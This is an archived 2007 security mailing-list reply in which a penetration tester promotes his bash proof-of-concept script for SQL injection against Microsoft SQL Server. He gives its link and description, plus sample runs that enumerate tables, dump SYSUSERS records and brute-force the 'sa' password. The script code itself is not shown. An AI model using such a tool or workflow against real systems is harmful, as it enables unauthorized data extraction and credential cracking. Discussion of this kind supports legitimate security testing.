Re: Open Source SQL Inject, XSS, Remote File Include Testing

From: Marco Ivaldi (raptor@mediaservice.net)
Date: Mon May 21 2007 - 07:45:41 EDT

• Next message: ebk_lists@hotmail.com: "Re: Re: Legality of WEP Cracking"
• Previous message: Larry Offley: "Re: Legality of WEP Cracking"
• In reply to: winsoc: "Open Source SQL Inject, XSS, Remote File Include Testing"
• Next in thread: Marco Ivaldi: "Re: Open Source SQL Inject, XSS, Remote File Include Testing"
• Reply: Marco Ivaldi: "Re: Open Source SQL Inject, XSS, Remote File Include Testing"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

On Sat, 19 May 2007, winsoc wrote:

> Can anyone recommend a quick and cheerful Open Source Tool which will
> test websites for SQL Injection, XSS, Remote File Include.

Speaking of SQL injection, just wanted to point out a bash script i put
together while pen-testing some web applications that use MS SQL Server as
back-end:

http://www.0xdeadbeef.info/code/mssql-hax0r

# Proof-of-concept multi-purpose SQL injection script for Microsoft SQL
# Server exploitation. Three operational mode are currently available:
# info (Information Gathetering), dump (Record Dump), and brute (Brute
# Force). You may need to tweak the code a bit to make it fit your needs
# (i.e., modifying the injection string and/or the language used by the
# RDBMS).

You shouldn't expect anything too fancy (it's still v0.1 after all;), but
it does its job:

root@shaolin:~# ./mssql-hax0r info tables+++
DBFoobar
         Accounting (id:390494850)
                 CanoneAnnuo (money)
                 CodiceFornitore (varchar)
                 dataInsert (datetime)
                 GroupId (char) *
                 GroupInsert (varchar)
                 idAccount (varchar)
                 idAnagrafica (int)
[...]
root@shaolin:~# ./mssql-hax0r dump
--------------------------------
SYSUSERS.uid=0
SYSUSERS.name=public
SYSUSERS.password=
--------------------------------
SYSUSERS.uid=1
SYSUSERS.name=dbo
SYSUSERS.password=
--------------------------------
SYSUSERS.uid=2
SYSUSERS.name=guest
SYSUSERS.password=
--------------------------------
3 record(s) dumped.

root@shaolin:~# ./mssql-hax0r brute xxx
Default (empty) password not valid, starting bruteforce.

aaa
bbb
ccc
password

Password of 'sa' user is 'password'!;)

Enjoy,

-- 
Marco Ivaldi, OPST
Chief Security Officer    Data Security Division
@ Mediaservice.net Srl    http://mediaservice.net/
------------------------------------------------------------------------
This List Sponsored by: Cenzic
Are you using SPI, Watchfire or WhiteHat?
Consider getting clear vision with Cenzic
See HOW Now with our 20/20 program!
http://www.cenzic.com/c/2020
------------------------------------------------------------------------

• Next message: ebk_lists@hotmail.com: "Re: Re: Legality of WEP Cracking"
• Previous message: Larry Offley: "Re: Legality of WEP Cracking"
• In reply to: winsoc: "Open Source SQL Inject, XSS, Remote File Include Testing"
• Next in thread: Marco Ivaldi: "Re: Open Source SQL Inject, XSS, Remote File Include Testing"
• Reply: Marco Ivaldi: "Re: Open Source SQL Inject, XSS, Remote File Include Testing"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:49 EDT